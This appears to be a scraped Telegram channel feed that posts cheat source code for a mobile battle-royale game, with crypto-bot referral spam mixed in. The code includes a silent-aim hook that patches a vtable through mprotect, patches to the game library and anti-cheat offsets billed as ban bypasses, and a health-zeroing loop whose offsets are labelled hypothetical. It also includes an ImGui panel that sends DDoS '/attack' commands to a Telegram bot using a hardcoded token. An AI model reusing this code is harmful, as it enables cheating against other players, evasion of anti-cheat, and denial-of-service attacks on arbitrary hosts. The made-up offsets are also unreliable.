857
Підписники
Немає даних24 години
-47 днів
-3630 день
Архів дописів
auto VTable = (void **) ShootWeaponComponent->VTable;
// CHANGE22222 add lambda function f_mprotect
auto f_mprotect = [](uintptr_t addr, size_t len, int32_t prot) -> int32_t {
static_assert(PAGE_SIZE == 4096);
constexpr size_t page_size = static_cast<size_t>(PAGE_SIZE);
void* start = reinterpret_cast<void*>(addr & -page_size);
uintptr_t end = (addr + len + page_size - 1) & -page_size;
return mprotect(start, end - reinterpret_cast<uintptr_t>(start), prot);
};
if (VTable && (VTable[shoot_event_idx] != shoot_event)) {
orig_shoot_event = decltype(orig_shoot_event)(
VTable[shoot_event_idx]);
// CHANGE22222 add call of f_mprotect
f_mprotect((uintptr_t)(&VTable[shoot_event_idx]), sizeof(uintptr_t), PROT_READ | PROT_WRITE);
VTable[shoot_event_idx] = (void *) shoot_event;
}
}
}
}
}
}
Join @KNIGHTMODSSRCS
Bullet Track Fake Damage Fix With Full Source
SilentAim_Offset;
void (*orig_shoot_event)(USTExtraShootWeaponComponent *thiz, FVector start, FRotator rot, void *unk1, int unk2) = 0;
bool qwcifqvs86y8fify = false;
void shoot_event(USTExtraShootWeaponComponent *thiz, FVector start, FRotator rot, ASTExtraShootWeapon *weapon, int unk1) {
if (Config.SilentAim.Enable) {
ASTExtraPlayerCharacter *Target = GetTargetByPussy();
if (Target) {
bool triggerOk = false;
if (Config.AimBot.Trigger != EAimTrigger::None) {
if (Config.AimBot.Trigger == EAimTrigger::Shooting) {
triggerOk = g_LocalPlayer->bIsWeaponFiring;
} else if (Config.AimBot.Trigger == EAimTrigger::Scoping) {
triggerOk = g_LocalPlayer->bIsFPPOnVehicle;
} else if (Config.AimBot.Trigger == EAimTrigger::Any) {
triggerOk = g_LocalPlayer->bIsWeaponFiring || g_LocalPlayer->bIsGunADS;
}
} else triggerOk = true;
if (triggerOk) {
FVector targetAimPos = Target->GetBonePos("Head", {});
if (Config.AimBot.Target == EAimTarget::Chest) {
targetAimPos.Z -= 25.0f;
}
UShootWeaponEntity *ShootWeaponEntityComponent = thiz->ShootWeaponEntityComponent;
if (ShootWeaponEntityComponent) {
ASTExtraVehicleBase *CurrentVehicle = Target->CurrentVehicle;
if (CurrentVehicle) {
FVector LinearVelocity = CurrentVehicle->ReplicatedMovement.LinearVelocity;
float dist = g_LocalPlayer->GetDistanceTo(Target);
auto timeToTravel = dist / ShootWeaponEntityComponent->BulletRange;
targetAimPos = UKismetMathLibrary::Add_VectorVector(targetAimPos, UKismetMathLibrary::Multiply_VectorFloat(LinearVelocity, timeToTravel));
} else {
FVector Velocity = Target->GetVelocity();
float dist = g_LocalPlayer->GetDistanceTo(Target);
auto timeToTravel = dist / ShootWeaponEntityComponent->BulletRange;
targetAimPos = UKismetMathLibrary::Add_VectorVector(targetAimPos, UKismetMathLibrary::Multiply_VectorFloat(Velocity, timeToTravel));
}
FVector fDir = UKismetMathLibrary::Subtract_VectorVector(targetAimPos, start);
FRotator sex = UKismetMathLibrary::Conv_VectorToRotator(fDir);
rot = sex;
if (Config.Recoil) {
if (g_LocalPlayer->bIsGunADS) {
if (g_LocalPlayer->bIsWeaponFiring) {
float dist = g_LocalPlayer->GetDistanceTo(Target) / 100.f;
targetAimPos.Z -= dist * Config.Recc;
}}}
}
}
}
}
return orig_shoot_event(thiz, start, rot, weapon, unk1);
}
if (Config.SilentAim.Enable) {
auto WeaponManagerComponent = localPlayer->WeaponManagerComponent;
if (WeaponManagerComponent) {
auto propSlot = WeaponManagerComponent->GetCurrentUsingPropSlot();
if ((int) propSlot.GetValue() >= 1 && (int) propSlot.GetValue() <= 3) {
auto CurrentWeaponReplicated = (ASTExtraShootWeapon *) WeaponManagerComponent->CurrentWeaponReplicated;
if (CurrentWeaponReplicated) {
auto ShootWeaponComponent = CurrentWeaponReplicated->ShootWeaponComponent;
if (ShootWeaponComponent) {
int shoot_event_idx = 168;
Repost from 𝐊𝐍𝐈𝐆𝐇𝐓 𝐌𝐎𝐃𝐒 𝐒𝐑𝐂𝐒
Bullet Track Fake Damage Fix With Full Source
SilentAim_Offset;
void (*orig_shoot_event)(USTExtraShootWeaponComponent *thiz, FVector start, FRotator rot, void *unk1, int unk2) = 0;
bool qwcifqvs86y8fify = false;
void shoot_event(USTExtraShootWeaponComponent *thiz, FVector start, FRotator rot, ASTExtraShootWeapon *weapon, int unk1) {
if (Config.SilentAim.Enable) {
ASTExtraPlayerCharacter *Target = GetTargetByPussy();
if (Target) {
bool triggerOk = false;
if (Config.AimBot.Trigger != EAimTrigger::None) {
if (Config.AimBot.Trigger == EAimTrigger::Shooting) {
triggerOk = g_LocalPlayer->bIsWeaponFiring;
} else if (Config.AimBot.Trigger == EAimTrigger::Scoping) {
triggerOk = g_LocalPlayer->bIsFPPOnVehicle;
} else if (Config.AimBot.Trigger == EAimTrigger::Any) {
triggerOk = g_LocalPlayer->bIsWeaponFiring || g_LocalPlayer->bIsGunADS;
}
} else triggerOk = true;
if (triggerOk) {
FVector targetAimPos = Target->GetBonePos("Head", {});
if (Config.AimBot.Target == EAimTarget::Chest) {
targetAimPos.Z -= 25.0f;
}
UShootWeaponEntity *ShootWeaponEntityComponent = thiz->ShootWeaponEntityComponent;
if (ShootWeaponEntityComponent) {
ASTExtraVehicleBase *CurrentVehicle = Target->CurrentVehicle;
if (CurrentVehicle) {
FVector LinearVelocity = CurrentVehicle->ReplicatedMovement.LinearVelocity;
float dist = g_LocalPlayer->GetDistanceTo(Target);
auto timeToTravel = dist / ShootWeaponEntityComponent->BulletRange;
targetAimPos = UKismetMathLibrary::Add_VectorVector(targetAimPos, UKismetMathLibrary::Multiply_VectorFloat(LinearVelocity, timeToTravel));
} else {
FVector Velocity = Target->GetVelocity();
float dist = g_LocalPlayer->GetDistanceTo(Target);
auto timeToTravel = dist / ShootWeaponEntityComponent->BulletRange;
targetAimPos = UKismetMathLibrary::Add_VectorVector(targetAimPos, UKismetMathLibrary::Multiply_VectorFloat(Velocity, timeToTravel));
}
FVector fDir = UKismetMathLibrary::Subtract_VectorVector(targetAimPos, start);
FRotator sex = UKismetMathLibrary::Conv_VectorToRotator(fDir);
rot = sex;
if (Config.Recoil) {
if (g_LocalPlayer->bIsGunADS) {
if (g_LocalPlayer->bIsWeaponFiring) {
float dist = g_LocalPlayer->GetDistanceTo(Target) / 100.f;
targetAimPos.Z -= dist * Config.Recc;
}}}
}
}
}
}
return orig_shoot_event(thiz, start, rot, weapon, unk1);
}
if (Config.SilentAim.Enable) {
auto WeaponManagerComponent = localPlayer->WeaponManagerComponent;
if (WeaponManagerComponent) {
auto propSlot = WeaponManagerComponent->GetCurrentUsingPropSlot();
if ((int) propSlot.GetValue() >= 1 && (int) propSlot.GetValue() <= 3) {
auto CurrentWeaponReplicated = (ASTExtraShootWeapon *) WeaponManagerComponent->CurrentWeaponReplicated;
if (CurrentWeaponReplicated) {
auto ShootWeaponComponent = CurrentWeaponReplicated->ShootWeaponComponent;
if (ShootWeaponComponent) {
int shoot_event_idx = 168;
https://t.me/Tonvex_bot?start=5509692667
TonVex - Ваш Путь к Финансовой Независимости.
PATCH_LIB("libUE4.so ","0xadd32a0", " 00 00 80 D2 C0 03 5F D6");//ZSt9terminatev One opset all ban fixer now now you change 😂
if (Config.HighRisk.Magic)
{
auto EnemyList = *(uintptr_t *)((uintptr_t)Game + 0x1234); // Hypothetical pointer to enemy list
int EnemyCount = *(int *)(Game + 0x1238); // Hypothetical pointer to enemy count
for (int i = 0; i < EnemyCount; ++i)
{
auto Enemy = *(uintptr_t *)(EnemyList + i * sizeof(uintptr_t));
if (Enemy != 0)
{
bool isInCover = *(bool *)(Enemy + 0x164); // Hypothetical flag for cover status
if (isInCover)
{
*(float *)(Enemy + 0x260) = 0.0f; // Hypothetical health offset, setting to zero to kill
}
}
}
}
Full power code magic 😘
Loader crash v3 fix offset ✅
Anogs :- 3C8A6C
Anogs :- 3C8034 --- use both
Edit :- C0 03 5F D6
64bit bgmi 3.4
By@mr_manny01
#include <string> #include <cstdlib> #include <iostream> #include <string.h> #include <curl/curl.h> //====================#BY@mr_manny01====================// /// Buffers for input fields char ddosIpBuffer[16] = "192.168.1.1"; char ddosPortBuffer[6] = "73886"; char ddosTimeBuffer[6] = "779"; bool ddosEnabled = false; //====================#BY@mr_manny01====================// void SendDdosCommandToTelegram(const char* ip, const char* port, const char* time) { std::string botToken = "7535112403:AAFWR3Y-Tulvjs-FgNydykZhOF-6WiPgH6k"; std::string chatId = "6442310977"; std::string command = "/attack " + std::string(ip) + " " + std::string(port) + " " + std::string(time); CURL* curl = curl_easy_init(); if (curl) { char* escaped_command = curl_easy_escape(curl, command.c_str(), command.length()); if (escaped_command) { std::string url = "https://api.telegram.org/bot" + botToken + "/sendMessage?chat_id=" + chatId + "&text=" + escaped_command; curl_easy_setopt(curl, CURLOPT_URL, url.c_str()); curl_easy_setopt(curl, CURLOPT_FAILONERROR, 1L); CURLcode res = curl_easy_perform(curl); if (res != CURLE_OK) { std::cerr << "cURL error: " << curl_easy_strerror(res) << std::endl; } else { std::cout << "Command sent: " << command << std::endl; } curl_free(escaped_command); } else { std::cerr << "Failed to escape command." << std::endl; } curl_easy_cleanup(curl); } else { std::cerr << "Failed to initialize cURL" << std::endl; } } //====================#BY@mr_manny01====================// if (ImGui::CollapsingHeader("DDoS Function")) { ImGui::Text("DDoS Attack Command"); ImGui::Spacing(); if (ImGui::InputText("IP Address", ddosIpBuffer, sizeof(ddosIpBuffer), ImGuiInputTextFlags_EnterReturnsTrue)) { } if (ImGui::InputText("Port", ddosPortBuffer, sizeof(ddosPortBuffer), ImGuiInputTextFlags_EnterReturnsTrue)) { } if (ImGui::InputText("Time (seconds)", ddosTimeBuffer, sizeof(ddosTimeBuffer), ImGuiInputTextFlags_EnterReturnsTrue)) { } ImGui::Checkbox("Enable DDoS", &ddosEnabled); if (ddosEnabled) { if (ImGui::Button("Run DDoS Attack") || ImGui::IsKeyPressed(ImGui::GetKeyIndex(ImGuiKey_Enter))) { if (strlen(ddosIpBuffer) > 0 && strlen(ddosPortBuffer) > 0 && strlen(ddosTimeBuffer) > 0) { SendDdosCommandToTelegram(ddosIpBuffer, ddosPortBuffer, ddosTimeBuffer); } else { ImGui::Text("Please fill in all fields."); } } } } CREDIT #mr_manny01 JOIN @HUNTEROGMOD
https://t.me/rocky_rabbit_bot/play?startapp=frId5509692667
Rocky Rabbit: Fun and Earnings! 🐰🚀
Play Rocky Rabbit for fun and profit! Join through this link and let’s start our profitable journey together!
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
